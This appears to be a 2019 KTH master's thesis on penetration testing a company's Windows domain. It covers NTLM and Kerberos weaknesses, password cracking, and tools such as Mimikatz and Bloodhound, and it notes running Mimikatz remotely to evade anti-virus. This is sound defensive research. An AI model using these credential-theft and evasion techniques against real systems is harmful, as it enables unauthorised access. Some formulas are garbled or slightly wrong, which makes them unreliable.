Vulnerability Assessment of Authentication Methods in a Large-Scale Computer System

(1)

IN

DEGREE PROJECT COMPUTER SCIENCE AND ENGINEERING, SECOND CYCLE, 30 CREDITS

STOCKHOLM SWEDEN 2019,

Vulnerability Assessment of

Authentication Methods in a Large- Scale Computer System

DAVIS FREIMANIS

KTH ROYAL INSTITUTE OF TECHNOLOGY

SCHOOL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCE

(2)

(3)

Vulnerability Assessment of Authentication Methods in a Large-Scale Computer

System

DAVIS FREIMANIS

Master in Computer Science Date: July 5, 2019

Supervisor: Pontus Johnson Examiner: Mathias Ekstedt

School of Electrical Engineering and Computer Science

Swedish title: Sårbarhetsbedömning av autentiseringsmetoder i ett storskaligt datorsystem

(4)

(5)

iii

Abstract

Vulnerabilities exist in almost all software programs. Some software is more vulnerable than others. A method that can be used to mitigate the vulnerabilities is penetration testing. In this thesis, a penetration test was conducted on a large scale computer system provided by a company. The goal of the thesis was to see if vulnerabilities could be found, with a focus on the field of authentication. After conduction a thorough penetration test there were vulnerabilities found that threaten the confidentiality and integrity of the system.

Authentication vulnerabilities were found by leaking password hashes and by performing pass-the-hash and pass-the-ticket exploits.

(6)

Sammanfattning

Sårbarheter finns i nästan alla mjukvaruprogram. Vissa mer allvarliga än and- ra. En metod som kan användas för att minska risken att ett system blir utsatt för hackerattacker är att utföra så kallade penetrationstest. I den här uppsat- sen så presenteras ett sätt att utföra penetrationstest såväl som resultatet av ett penetrationstest som har utförts hos ett företag. Målet var att hitta om det finns sårbarheter i systemet, först och främst inom autentisering. I systemet hittades ett par sårbarheter som hotar konfidentialiteten och integriteten i systemet. Brister i autentisering hittades genom att läcka lösenordshashar och genom att utföra pass-the-hash- och pass-the-ticket-exploateringar.

(7)

Chapter 1 Introduction

We live in a highly connected world and every day new devices are being connected and controlled over the public internet. It is important to secure these systems to prevent malicious attackers from gaining access to the services that we depend on every day.

The Common Vulnerabilities and Exposures (CVE) list is a database of publicly disclosed vulnerabilities and exposures [1]. The number of vulnerabilities is continually growing every year and in 2018 the database hit over 100 000 entries [2, 3]. Vulnerabilities in large scale systems are not uncommon as we read about big data breaches like Equifax¹ [4] or large nation-sponsored attacks like the notorious Stuxnet worm²that infected Iran’s nuclear facility and made centrifuges spin out of control until failure [5]. In Windows alone, there are plenty of vulnerabilities discovered and disclosed by security researchers.

The Microsoft patch Tuesday is a day every month when Microsoft releases patches to vulnerabilities [6]. These patches only fix vulnerabilities known to Microsoft. There still exists discovered vulnerabilities that are not reported and stashed away or sold on the black market. No one knows how many exist and no one knows when the vulnerabilities will be exploited [7].

In a report that McAfee published together with the Center for Strategic and International Studies (CSIS), it is estimated that in 2014, cybercrime cost $500 billion and estimates that it will cost over $600 billion in 2018 [8]. This is equal to 0.8% of the global GDP. For this reason, there exists a market for exploits and vulnerabilities. These vulnerabilities can be used for espionage or cyber

1Vulnerability in Apache Struts CVE-2017-5638

2LNK vulnerability CVE-2010-2568 and others

1

(14)

warfare and governments are stockpiling these vulnerabilities. There has been discussion around stockpiling as leaking these vulnerabilities could lead to more harm than good. Research shows that vulnerabilities have an average life expectancy of 6.9 years [9].

Penetration testing is a way to find and to mitigate vulnerabilities or at least delay an attacker to access a system by assessing the security before the attack has happened. This kind of security assessment is also called ethical hacking and is commonly conducted by external security experts. By paying security experts to find vulnerabilities in a system before they have been exploited it is usually more cost effective in the long run. This is also why big companies like Google has their own bug bounty programs where anyone can get access to test systems and get paid when a vulnerability is reported [10, 11].

The methodology in this thesis will be similar to the later mentioned and will be described in detail in Chapters 4 and 5. A real system provided by a company will be analyzed and tested to find as many vulnerabilities as possible.

1.1 Problem Statement

Vulnerabilities in a computer system can damage a company’s trust. The damage comes from when a system gets compromised or data gets leaked. One way for an attacker to get inside a network and to get closer to its target is to abuse the authentication mechanisms.

In this thesis, a penetration test will be conducted on a company’s system to detect and report potential vulnerabilities to authentication.

1.1.1 Research Question

This thesis is done in collaboration with KTH and a company that will remain anonymous throughout this thesis. The research question of this thesis is:

What kind of authentication vulnerabilities can be found in a large-scale com- puter system and what actions can be taken to mitigate the attacks?

(15)

CHAPTER 1. INTRODUCTION 3

1.1.2 Hypothesis

The hypothesis is that several vulnerabilities will be found in the system due to the size and complexity of the system.

1.2 Goal of the Thesis

The main goal of this thesis is to conduct a comprehensive penetration test on a large scale computer system for a company. Vulnerabilities will be enumerated and exploited to create a proof of concept attack. The results from the test will give the company good advice to secure their system to protect against malicious actors in the future.

1.3 Scope

The scope of the thesis uses penetration testing methods to find vulnerabilities in the provided system. Social engineering techniques and physical penetration testing are not to be used in this thesis. The perimeter security will not be tested as the attacker will already be inside the network in this scenario.

To narrow the scope of the thesis, the focus area of authentication is chosen after the initial threat modeling of the system. Found vulnerabilities will be disclosed to the company in a responsible manner as it will be described in Section 2.4.1. The thesis does not include fixing found vulnerabilities and will be left to the company.

1.4 Outline

This chapter has introduced the topic and described the problem statement and the goals of this thesis. The rest of the thesis is structured as follows. Chap- ter 2 and 3 presents the theory and background material for this thesis while Chapter 4 and 5 presents the penetration testing methodology as well as the target system, hacking setup used by the attacker and how the found vulnerabilities work. Chapter 6 presents the initial results from the threat modeling phase while Chapter 7 presents the results from the exploitation phase where

(16)

the authentication vulnerabilities are exploited. Chapter 8 discusses the results and Chapter 9 concludes the thesis.

(17)

Chapter 2 Theory

This chapter presents a theoretical overview of the main concepts used to fully understand the thesis. Section 2.1 presents what information security and the CIA-triad is. Section 2.2 presents the fundamentals of cryptography that is used in authentication. Section 2.3 presents password cracking techniques and mitigations. This chapter is wrapped up in Section 2.4 where different vulnerability disclosure methods are presented.

2.1 Information Security

NIST [12] defines "Information Security" as:

The term information security means protecting information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide integrity, confidentiality, and availability.

The fundamentals of information security can be summarized with a concept called the CIA-triad (Confidentiality, Integrity, and Availability). The STRIDE model that is presented in Section 4.3 is closely connected to the CIA-triad and is a way to find and mitigate vulnerabilities that violates these concepts. The CIA-triad and its augmentations (Authenticity and Account- ability) are described next.

5

(18)

2.1.1 Confidentiality

Confidentiality is the assurance that information gets seen by only authorized users and is equivalent to privacy. An easy way to protect files against unauthorized access is to password protect and encrypt files such that only users with the correct key can access the files [12].

2.1.2 Integrity

Integrity is to protect data and systems against tampering. It is important that critical information can be trusted [12]. Ways to mitigate against threats to integrity can be cryptographic signatures or by implementing Access Control Lists (ACL) [13].

2.1.3 Availability

Availability is ensuring reliable access to information. A system should not deny access to authorized users [12]. A common attack against availability is Denial of Service (DoS) attacks.

2.1.4 Authenticity

Authenticity is a property important for trust and verifiability. It is important that users can be verified and that a user can validate that a message comes from the correct origin [13].

2.1.5 Accountability

Accountability is that actions can be traced to events. In case of a data breach, logs must be kept for later forensics that could help in legal actions. Account- ability also helps with non-repudiation [13].

(19)

CHAPTER 2. THEORY 7

2.2 Cryptography

Cryptography is an important component in any authentication scheme. Con- fidentiality and integrity from the CIA-triad are both solved with correct usage of mathematical functions. This section is based on Douglas R. Stinson’s book Cryptography Theory and Practice [14] and presents the core concepts of cryptography that are used in the field of authentication.

In the examples, Alice and Bob represents two persons that want to communi- cate with each other. Mallory represents a malicious user that wants to eaves- drop and alter messages.

2.2.1 Symmetric Cryptography

Symmetric cryptography is based on a pre-shared key that Alice and Bob have agreed on in advance. It is called symmetric cryptography because encryption and decryption use the same key. Alice encrypts her message m with the encryption procedure ek using the pre-shared key k. Alice sends the produced ciphertext c over an insecure channel to Bob. Bob can decrypt the message using the same pre-shared key using the decryption procedure d^k. Unless Mal- lory knows the pre-shared key, she is not able to intercept the message and decrypt it [14].

c = e_k(c) m = d_k(c)

A problem that exists is to share the key between the parties. The Diffie- Hellman key exchange scheme was first published in 1976 by Whitfield Diffie and Martin Hellman and can be used to share a secret key over an insecure channel. It is based on the discrete logarithm problem [15]. Symmetric cryptography is shown in Figure 2.1 where Alice sends a message to Bob by en- crypting it with the pre-shared key. The message is then sent over an insecure channel. Bob can decrypt the message because he has the key.

(20)

Shared key

Alice Bob

Message encrypted with shared key

Figure 2.1: Symmetric cryptography

2.2.2 Public-Key Cryptography

Public-key cryptography or asymmetric cryptography was first proposed by Diffie and Hellman in 1976 [15] and was a year later implemented by Rivest, Shamir, and Adleman as the RSA algorithm [16].

A public-key infrastructure consists of a private key and a public key. The public key is published to the world and the private key is kept by Bob. If Alice wants to send something to Bob, she can use Bob’s public key, encrypt the message and send it to Bob. Only Bob can encrypt the message because he is the only one with the private key. The RSA algorithm is presented below in five steps [14].

1. Generate two large primes, p and q, such that p 6= q 2. n ← pq and φ(n) ← (p − 1)(q − 1)

3. Choose a random b where 1 < b < φ(n) such that gcd(b, φ(n)) = 1 4. a ← b⁻¹ mod φ(n)

5. The public key is (n, b) and the private key is (p, q, a)

The keys can be used to encrypt and decrypt messages. To encrypt a message x we use the encryption function e(x):

e(x) = x^b mod n

and to decrypt message y we use the decryption function d(y):

d(y) = y^a mod n

(21)

CHAPTER 2. THEORY 9

One attack to RSA is if the two prime factors of n can be found. In that case it is easy to compute φ(n) and then reverse engineer the decryption exponent [14]. The largest RSA number that has been factored so far is 768-bits and was done over the span of 2 years requiring more than 10²⁰operations or equiva- lently 2000 years of CPU usage for a 2.2GHz AMD Opteron [17]. The prime numbers in RSA are usually 1024, 2048 or 4096 bits in length, where larger prime numbers results in higher security if generated correctly.

In Figure 2.2, public-key cryptography is shown. Bob’s public-key is available to anyone including Alice and Mallory. Both Alice and Mallory can encrypt files with this key, but only Bob can decrypt it with his private key.

Bob's public key

Bob's private

key

Alice Bob

Message encrypted with Bob's public key

Figure 2.2: Public-key cryptography

2.2.3 Hash Functions

Cryptographic hash functions or one-way functions are used to provide data integrity. Common usages for hash functions are digital signatures, file integrity, and password storage.

A hash function h : X → Y takes a x ∈ X and produces a y ∈ Y making a pair (x, y). A good hash function should have three properties:

• Preimage resistance

• Second preimage resistance

• Collision resistance

Preimage resistance: Given a hash function h : X → Y and a y ∈ Y , it should be hard to find an x ∈ X such that h(x) = y.

(22)

Second preimage resistance: Given a hash function h : X → Y and a x ∈ X, it should be hard to find x⁰ ∈ X such that x⁰ 6= x and h(x⁰) = h(x).

Collision resistance: Given a hash function h : X → Y , it should be hard to find x, x⁰ ∈ X such that x⁰ 6= x and h(x⁰) = h(x).

The properties say that it should be hard to find two different messages that produce the same hash and it should also be hard to find the message given a hash. Preimage resistance ensures confidentiality. A hashed message or password should not be possible to reverse. Second preimage resistance ensures integrity and is a protection against tampering. If second preimage resistance fails, an attacker could modify files in such a way that the hash stays the same [14].

2.2.4 Message Authentication Code

Message Authentication Code (MAC) is a technique used for message integrity. The person that receives a message wants to be certain that it comes from the correct source and has not been tampered with. By using a shared key, Alice can generate a MAC based on the shared key and the message. The MAC is sent together with the message and Bob can verify that Alice was the one that sent the message. Digital signatures work in a similar way but use a public key infrastructure instead. An HMAC is a hash-based MAC and can use a hashing algorithm like MD5 or SHA1 [13, 14].

2.3 Password Cracking

Password cracking is an important tool in penetration testing. To be able to move laterally, the attacker can find credentials stored on a compromised computer that is reused in multiple locations. Usually, the passwords are hashed with a cryptographic one-way function. This means that to crack a password, the exact password must be hashed with the same function and then compared to the hash. The naive way is to do it by brute force, checking every possible combination. Dictionary attacks target the most common passwords, words, and phrases. Rainbow tables are lists of precomputed hashes that allows for faster cracking. The most common tools for cracking passwords are Hashcat [18] and John the Ripper [19].

(23)

CHAPTER 2. THEORY 11

2.3.1 Brute-force

A brute-force attack tests every possible combination of a chosen character set. This is also called the keyspace of the password. The number of combinations depends on the length of the password and the keyspace that is used. A standard US-keyboard has 95 keys which means that there exists 95^xpossible passwords for a password of length x. The number of combinations grows exponentially when the length of the password increases. Using additional characters would further increase the keyspace of the password. Brute-force is a good technique to use to crack short passwords, but when it comes to longer ones there exist better and more reliable techniques.

2.3.2 Dictionary Attacks

Dictionaries are lists of commonly used passwords, words from dictionaries and easy key combinations. Rules can be applied to check common permu- tations and substitution of characters in words. A dictionary attack is a type of brute-force attack and is effective to crack commonly used passwords but requires computational resources to generate the hashes for every word in the list.

2.3.3 Rainbow Tables

Rainbow tables are precomputed lists of hashes that do not require to recom- pute the hash of every possible combination. These lists are usually huge and are a way to trade time for storage [20]. A precomputed list of NTLM-hashes with all possible password combinations that can be made on a standard 95-key US keyboard of a length of up to 9 is 690 GB in size [21].

2.3.4 Hybrid Attacks

Password policies commonly require the user to choose a password with an uppercase letter, digit, and symbol. By combining dictionary attacks with brute-force, the attacker can append digits and symbols to the passwords to test different variants of the password with small alterations. This is called a hybrid attack. Substitution rules can also be added to try commonly used substitutions such as changing the letter A with the digit 4.

(24)

2.3.5 Password Cracking Defences

To have a secure password it is important that both the password is safe and that the password is stored in a secure manner. A password should, when stored be hashed with a strong hash function to assure its integrity in a case the database was to be compromised. Due to low entropy in user-defined passwords, it is not recommended to only hash the password. To further increase the integrity of passwords, a random salt value should be generated for every user that gets concatenated to the password before feeding it to the hashing algorithm [22].

hashed password = H(salt|password)

This prevents an attacker to use dictionary attacks and rainbow tables and has to generate hashes for every user separately. By using salt, it is impossible to see if a password is being used by multiple users. NTLMv1 nor NTLMv2, commonly used authentication methods in Windows (see Section 3.2) uses this protection mechanism and is, therefore, easier to crack and to detect common passwords.

The choice of the hashing algorithm is also important as the longer it takes to generate a hash, the more resources the hacker requires to crack a password.

Another method to prevent password cracking is to use a key derivation function such as PBKDF, bcrypt or scrypt to increase the hashing time. Hashing the password once only takes the user a fraction of a second, but when an attacker tries to crack the password this time increment is very noticeable. This type of hashing function is recommended practice when storing passwords [23]. A comparison between commonly used hashes is presented in Table 2.1.

The benchmark was done on a machine with 8x Nvidia GTX 1080 cards and Hashcat v.3.00 [18] [24].

Hashtype (Hashcat hash-mode [25]) Hashes/second

NT-hash (1000) 334.0 GH/s

NetNTLMv1 (5500) 179.3 GH/s

NetNTLMv2 (5600) 13149.5 MH/s

bcrypt (3200) 105.7 kH/s

scrypt (8900) 3493.6 kH/s

Table 2.1: Hashcat benchmarks for common hashes

(25)

CHAPTER 2. THEORY 13

2.4 Vulnerability Disclosure

Vulnerability disclosure in computer science has multiple variants. When finding a flaw in a program it is possible to disclose the finding in a few different ways where the two most popular methods are responsible and full disclosure which is described next.

2.4.1 Responsible Disclosure

Responsible disclosure is sometimes called coordinated disclosure. When the vulnerability researcher finds a vulnerability, it gets reported to the affected vendor. The vendor is given a grace period usually ranging from 45 to 182 days [26]. The vendor is given this time to develop a patch for the vulnerability before the vulnerability is publicly disclosed. Many companies like Google [10] and Microsoft [27] has their own bug bounty programs where hackers are awarded money if they find and report bugs to the companies.

2.4.2 Full Disclosure

Full disclosure is the second type of vulnerability disclosure [26]. In full disclosure, a vulnerability is published without giving the vendor a forewarning.

This gives very little time for a patch to be released before attackers can exploit the vulnerability. Bruce Schneier has been known as an advocate for full disclosure when he in 2007 wrote an article that full disclosure is a good idea. His main arguments for it was that vendors did not act fast enough or at all when researchers found vulnerabilities, only when vulnerabilities was released to the public. He does, however, believe that responsible disclosure is good, but that it would not work if full disclosure existed [28]. Full disclosure is usually considered as the opposite of responsible disclosure.

(26)

Windows Authentication

This chapter presents an overview of Microsoft Active Directory in Section 3.1 and Section 3.2 presents the most common authentication methods in a Windows-based environments, namely challenge-response schemes and ticket-based schemes such as Kerberos.

3.1 Active Directory

Active Directory (AD) is a service for Microsoft Windows servers. It is a directory service whose purpose is to centralize domain management. The server in a network that is running AD is called Domain Controller (DC). Its purpose is to authenticate and authorize users and computers in its AD domain as well as enforcing security policies [29].

Active Directory was first released with Windows 2000 server edition and has since then evolved to an umbrella term for identity-related services in Windows server. In 2014, it was estimated that over 95% of Forbes 1000 companies use AD in their business [30], making it a target for hackers. This is what makes AD security crucial for both Microsoft and server administrators that configure the servers.

Data in AD is stored in objects. Objects can be user accounts, computers and Organizational Unit (OU). Administrators can use Group Policy Object (GPO) to manage all settings for individual users, computers, groups and Organiza- tional Unit. The policies range from screen savers to password policies. A domain administrator can set these policies to any object in Active Directory.

14

(27)

CHAPTER 3. WINDOWS AUTHENTICATION 15

There exist two types of objects, containers, and non-containers. As the data is stored in a hierarchical structure, containers can contain other containers or non-containers. Non-containers are leaf nodes in the structure and do not contain other objects. The most common container is an Organizational Unit.

Policies can be set for any object and is be applied in the hierarchy [29].

3.2 Windows Authentication

In Windows systems, there exist two main ways of authentication schemes.

The first one is challenge-response based authentication that is presented in Figure 3.1. In challenge-response schemes, the hash of the user is encrypted with a challenge from the server. In Windows there exist NTLMv1 and NTLMv2 that is presented next. Kerberos is a ticket based system. The main advantage with a ticket-based system is that the password or hash of the user is never sent on the network.

Authentication request Challenge

Response

Client Server

Figure 3.1: Challenge-response authentication

3.2.1 Challenge-Response

The challenge-response scheme consists of three messages:

1. The client wants to log in to a server. It sends an authentication request to the server.

2. The server generates a random sequence of bytes. This is called the challenge and is sent to the client

3. Both the client and server encrypt the challenge using a negotiated scheme using the user’s password. This is called the response

(28)

If the response from the client matches the result on the server then authentication succeeds. Otherwise, authentication fails and the client is denied access to the server. This procedure is presented in Figure 3.1. The benefit with a challenge-response scheme is that it prevents possible replay attacks as the challenge is randomly generated every time an authentication request is made.

This scheme also does not directly expose the user’s password, but in some cases, the password can be reversed and is presented in Section 2.3 [31].

LM Challenge-Response

LAN Manager (LM) authentication is one of the first authentication schemes.

It is fairly simple and depends on a weak hash algorithm for the password called LM-hash. The password in this scheme is limited to only 14 characters and the hashing algorithm can easily be described.

1. The password is converted to uppercase characters

2. The password in padded with null-bytes up to 14 characters

3. The padded password is split into two 7-byte parts that are used as a key to DES-encrypt the hardcoded ASCII-string "KGS!@#$%"

4. The two ciphertexts are concatenated and is the final LM-hash

To respond to the challenge sent by the server, the client adds padding to the LM-hash to create a 21-byte string. This string is split into three 7-byte parts that are each used as a key to DES-encrypt the challenge. The results are concatenated into a 24-byte string that is sent back to the server.

The LM scheme is very weak and should not be used in modern systems. The keyspace is greatly reduced due to the fact that the LM-hash is case insensitive.

The password is also limited to 14 characters. LM-hashes can be cracked using brute-force or rainbow tables to retrieve the cleartext password. Short passwords that are shorter than 8 characters will always have the same second half of the hash, easily identifying short passwords [31].

NTLMv1

NTLMv1 is very similar to LM challenge-response, but is more secure as it solves the most critical issues. Instead of using the LM-hash, NTLMv1 uses a

(29)

cryptographically stronger hash called NT-hash. The NT-hash uses MD4 [32]

to hash the user’s password:

NT-Hash = MD4(unicode(password))

The password is converted to little endian UTF-16 to produce a 16-byte hash using the algorithm.

The NTLMv1 challenge-response scheme is very similar to LM presented previously. It is presented in Figure 3.2.

Server challenge (SC)

Server Client

DES(K₁, SC)

DES(K₂, SC)

DES(K₃, SC) Bytes 1-7 of

NT-hash (K₁)

Bytes 8-14 of NT-hash (K₂)

Bytes 15-16 of NT-hash with null-byte padding (K3)

Response: 24-bit concatenation of results

Figure 3.2: NTLMv1 challenge-response protocol 1. The server sends an 8-byte randomly generated challenge C

2. Your password is hashed with MD4 to receive a 16-byte hash called NT-hash

3. The hashed password is padded with 5 null-bytes and split into 3 equal parts K¹, K₂, K₃of 7-bytes each

4. K1, K₂, K₃ is used as a key to encrypt C using DES

5. The response is the concatenation DES(K¹, C)|DES(K2, C)|DES(K3, C) and is 24-bits long

The server checks the response by validating it against its database or a centralized authentication server like Active Directory.

NTLMv1 solves the problem with LM by having more complex passwords.

The MD4 hash used to generate the NT-hash is not dependent on the password length. NTLMv1 is however cryptographically weak due to the use of DES

(30)

that only has a 56-bit key. It uses 3 parallel DES functions that does not depend on previous values [31]. The NT-hash is also vulnerable against brute-force attacks as shown in Table 2.1.

NTLMv2

NTLMv2 is the second version of the challenge-response protocol. It is im- proved and harder to crack than NTLMv1. The client sends two HMAC-MD5 hashes back to the server as the response. Figure 3.3 presents the NTLMv2 challenge-response protocol.

NT-Hash HMAC-MD5

Username

Domain name

HMAC-MD5 (LMv2)

HMAC-MD5 (NTv2) Client challenge (CC) SC

SC

CC*

Response 1: LMv2 + CC

Response 2: NTv2 + CC*

Server challenge (SC)

Server Client

Domain name Client challenge 2 Time Format

Figure 3.3: NTLMv2 challenge-response protocol

3.2.2 Kerberos

Kerberos [33] is a cryptographic authentication protocol developed at MIT.

The protocol is based on secret-key cryptography and is used to replace password-based authentication between clients and servers. This mitigates the risk of Man-In-The-Middle (MITM) attacks where an attacker can eaves- drop on the network to sniff unencrypted passwords.

Kerberos uses tickets instead of passwords and is widely used as Single Sign- On (SSO) service. The Kerberos architecture consists of a client, a service that the client wants to authenticate to and a Key Distribution Center (KDC).

The architecture is presented in Figure 3.4 along with all ticket requests and responses that are described next [33].

(31)

Client

Service Session Key TGS Session

Key User Password

Service

Service Secret Key Service Session Key

KDC

Authentication Server

User Database

TGS Session Key

Ticket Granting Service

TGS Session Key

Service Session Key

TGS Secret Key

Service Secret Key

2

AS-REP TGT

User ID

1

AS-REQ

6

AP-REP Authenticator

5

AP-REQ

TGS

Ticket Authenticator

3

TGS-REQ

TGT Authenticator

4

TGS-REP TGS

Ticket

Figure 3.4: Kerberos authentication process

Step 1. The Kerberos client wants to authenticate to a service. To do so, the client has to request a Ticket Granting Ticket (TGT) from the Authentication Service (AS). The client sends a request, AS-REQ to the AS containing the client’s ID.

Step 2. The AS receives the request and checks the ID against a user database

(32)

which is typically in the AD. The password corresponding to the client’s ID is hashed and is used to encrypt a Ticket Granting Service (TGS) session key.

AS also prepares a TGT that contains the client’s ID, network address, validity period and the TGS session key. The TGT is encrypted using a secret key of TGS. The two messages are sent in a response, AS-REP to the client.

Step 3. The Kerberos client receives the two messages and decrypts the TGS session key. The client is unable to decrypt the TGT and sends it to the TGS together with a service ID to request a ticket for the desired service. To authenticate, the client sends an authenticator message containing the ID of the client and a timestamp. This message is encrypted using the TGS session key and is sent in a request, TGS-REQ to the TGS.

Step 4. The TGS can decrypt the TGT using its private key to recover the TGS session key. The session key is used to decrypt the authenticator message that validates the client. TGS send a TGS ticket that contains the client ID, network address, validity period and client/service session key. This is encrypted using the services secret key. The TGS also sends the client/service session key that is encrypted using the TGS session key. The two messages are sent as a response, TGS-REP.

Step 5. The client now possesses an encrypted TGS ticket for the desired service. The client sends the TGS ticket and a new authenticator message encrypted with the client/service session key in a new request, AP-REQ to the service.

Step 6. The service responds with AP-REP if the data in the authenticator from the client is valid. The service sends a packet with the timestamp encrypted with the client/service session key.

Kerberos is the default authentication method in Windows since Windows 2000, but in many cases NTLM is used as a fallback when a service does not implement Kerberos authentication [34]. For Kerberos to work, every service needs to be registered to the AD. The KDC is installed on the DC and imple- ments both the AS and TGS to be able to look up users in the AD database.

(33)

Chapter 4 Penetration Testing

Penetration testing is usually deemed to be the good side of hacking and is sometimes called ethical hacking, red teaming or just pen-testing, and is the technique used in this thesis. Penetration testing is a technique used to find and mitigate vulnerabilities in computer systems. It is usually done by external security experts and can be executed in many ways. White-box and black-box penetration testing are two examples where the attacker is given all information including source code in the prior and no information at all in the former example. Penetration testing is done in multiple phases that is described in the following subsections [35].

Georgia Weidman [36] summarizes penetration with seven essential steps that is described next.

1. Pre-engagement Interactions 2. Intelligence Gathering 3. Threat Modeling 4. Vulnerability Analysis 5. Exploitation

6. Post Exploitation 7. Reporting

21

(34)

4.1 Pre-Engagement Interactions

It is important in every penetration testing job to set the scope of the testing and having clear boundaries with the client. This is also when the client can provide all necessary credentials and IP addresses for the interesting devices that is to be tested. A clear scope of the assignment should be set and the attacker must be informed what types of attacks should be in the scope. When attacking live systems, it is important that the system does not get flooded with unnecessary packets to avoid unnecessary load on production systems [36].

4.2 Intelligence Gathering

This phase is for information gathering or reconnaissance about the system that helps to map the infrastructure. Reconnaissance is arguably the most important phase in penetration testing. It is important to understand the complete system on a high level to be able to understand where vulnerabilities lie in the system. Looking at code that is old, or code that has been modified by many people can lead to unexpected vulnerabilities that no one knows about. The client can in most cases help with this step to get started. The communication with the client is important in most of the steps in penetration testing [35, 36].

The first step is usually to port scan the network with tools like Nmap [37] to identify all the hosts and all the ports that are open.

4.3 Threat Modeling

When the previous steps have been completed, it is time to do threat modeling.

By this time the attacker should have a good general knowledge of the system and can now focus attacks on the most critical parts of the system.

STRIDE is a threat modeling technique developed by Praerit Garg and Loren Kohnfelder in 1999 at Microsoft [38]. This method has been revised by Adam Shostack that has written a book on threat modeling [39]. This section is heav- ily be based on his research. The letters in STRIDE correspond to six different threat categories that is described next. STRIDE is used to enumerate threats that could be leveraged by an attacker.

(35)

CHAPTER 4. PENETRATION TESTING 23

Spoofing

Spoofing is the first threat category and is a threat that violates authenticity.

There are multiple entities that you can spoof. This includes spoofing people, services, computers and so on. Strong authentication is the primary way to mitigate spoofing, installing certificates, enforcing strong password policies and using secure protocols.

Tampering

Tampering is a threat against integrity and is the act of modifying something, e.g. changing files, memory or network traffic. The mitigation strategies for tampering is to use cryptographic protocols in networking and using ACLs to prevent tampering from non-authorized entities.

Repudiation

Repudiation is about denying the truth. An attacker will claim that nothing malicious was done and the defender needs to be able to prove that something malicious happened. By having good logging in a computer system on many different levels is extremely important. It is also crucial to not let anyone tam- per or delete logs.

Information Disclosure

Information disclosure is when information gets in the wrong hands, a user that is not authorized to see the information. There are many ways for information disclosure: sniffing network traffic, faulty permissions or verbose error messages. It is a threat to confidentiality and could damage a company’s reputation.

Denial of Service

Denial of service attacks is a threat against availability. This could be done by using up all of the defenders’ resources. By sending many requests, a server can get overloaded and be unresponsive. This can be accomplished using do- ing a symmetric attack where the attacker spends an equal amount of resources

(36)

as the defendant. A more sophisticated attacker could utilize an asymmetric attack that requires more resources to be used by the defendant. An example of this would be a ZIP-bomb or a NTP amplification attack [40].

Elevation of Privilege

Elevation of privilege is when a user reduces the set of restrictions or permissions that are set for that user. This is a threat against authorization and is one of the biggest threats in any system. A user could find a way to run privileged code arbitrarily e.g. with XSS or SQL injection.

4.4 Vulnerability Analysis

When the hosts and threats have been enumerated, it is time to search for possible vulnerabilities. This is a phase that can be done manually by an expe- rienced penetration tester or by using automated tools that can scan through huge databases with known vulnerabilities [1, 36].

4.5 Exploitation

The exploitation phase is where the attacker tries to penetrate the security of the system by exploiting a vulnerability [36]. The holy grail is to gain root privileges on the targeted host machine, but a successful attack could also be by crashing a server, exfiltrating documents or credentials that could open up for other attack vectors. Exploitation can be done with buffer overflows, weak authentication, SQL injections and many more. Exploitation frameworks like Metasploit [41] (see Section 5.1.2) exist that can easily exploit vulnerable systems.

4.6 Post Exploitation

As said in Section 4.5, the holy grail of penetration testing is to gain root privileges on a system i.e. have the access to do anything. This can be done in many ways. By exploiting a process on a system that runs as a more privileged

(37)

CHAPTER 4. PENETRATION TESTING 25

user could give the attacker more privileges. Other ways would be to find credentials to accounts that already have the required privileges or by using known vulnerabilities. Finding credentials is one way to pivot or move laterally in the network by gaining access to other computers. This could be done by reusing existing credentials [36].

4.7 Reporting

The final stage of penetration testing is to report the findings to the client. This stage is commonly done by writing a report that should inform the client about the security situation and recommend what actions should be taken [35, 36].

(38)

Methods

This chapter describes and presents the method used in this thesis. A system to attack was provided by the company and is described in Section 5.1. Fur- ther on, the two main phases of the thesis, threat modeling and exploitation is elaborated in Section 5.2 and Section 5.3.

5.1 Target System

A target system was provided for this thesis work. The system was virtual- ized in cloud infrastructure and was an identical representation of a real-world computer system that is used in production by the company. The system infrastructure is shown in Figure 5.1.

The system consisted of both Windows and Linux servers that were all connected to the same network. The system was also implemented with various firewalls that secure it from outside attacks, but in the scope of this thesis, the attacker was already connected to the network and was performing all attacks from the inside. The attacker could have gained access by finding flaws in the firewall configuration or by leveraging zero-day exploits on the security clearances.

All servers and computers were in the same domain that is controlled by the Domain Controller (DC) on the network. The DC ran Microsoft’s directory service Active Directory on Windows Server 2012 R2.

26

(39)

CHAPTER 5. METHODS 27

Client Client Client

Windows Server Windows Server

Windows Server Domain Controller

Linux Server Database

Figure 5.1: Target system infrastructure

5.1.1 Hacking Machine

Most of the penetration testing was done from a Linux computer located inside the target system. The operating system used for the machine was Kali Linux 2019.1 and consists of a wide variety of tools already bundled in the operating system. Additional tools were installed to further expand the toolset for finding vulnerabilities. Some of the tools will be briefly described.

5.1.2 Tools

Many tools were used when conducting the tests on the system. The tools that were the most impactful will be briefly presented next.

Nmap

Nmap [37, 42] is a tool to scan a network for live hosts, checking for open ports and figuring out the versions of the software that is behind the port. Nmap was used for reconnaissance to scan and enumerate hosts on the target network.

The logs from the output from Nmap was saved to be later used with other tools. Zenmap is the graphical interface for Nmap and can be used for a better overview.

(40)

Bloodhound

Bloodhound is a tool to scan and map an AD structure by querying three things on the network.

• Group membership of users and groups

• Administrators in the network

• User sessions. Who is logged in where?

This data can be collected on the network without administrative permissions.

By collecting this data, Bloodhound creates a graph and can calculate the shortest paths to escalate privileges in the network [43]. In Figure 5.2, the output from Bloodhound is showed as a graph where the vertices correspond to users, groups, computers, and domains. The edges correspond to group membership, administrative rights, user sessions, and domain trusts. The paths correspond to possible ways to move laterally in the network to get access to the domain administrator. This enables penetration testers to choose where to focus to escalate privileges.

Figure 5.2: Bloodhound output

(41)

Metasploit

Metasploit [41] is an open-source vulnerability exploitation framework owned by Rapid7. There exist commercial versions of Metasploit, but Kali Linux ships with the free version that was used in this thesis. Metasploit has many modules that can be used for reconnaissance and to exploit known vulnerabilities.

Mimikatz

Mimikatz [44] is a tool written in C by Benjamin Delpy. The tool is created to extract and manipulate credentials in Windows systems by reading from the LSASS subsystem in Windows that protects credentials. LSASS runs as an executable under the path %SystemRoot%\System32\lsass.exe, and requires local administrative privileges to read from it [45]. Mimikatz can be used to extract Kerberos tickets and other credentials.

Normally, running Mimikatz on a server is not desirable as anti-virus protection may detect it. It is, however, possible to run Mimikatz remotely using other tools like Metasploit or Powershell Empire, without ever writing code to the disk.

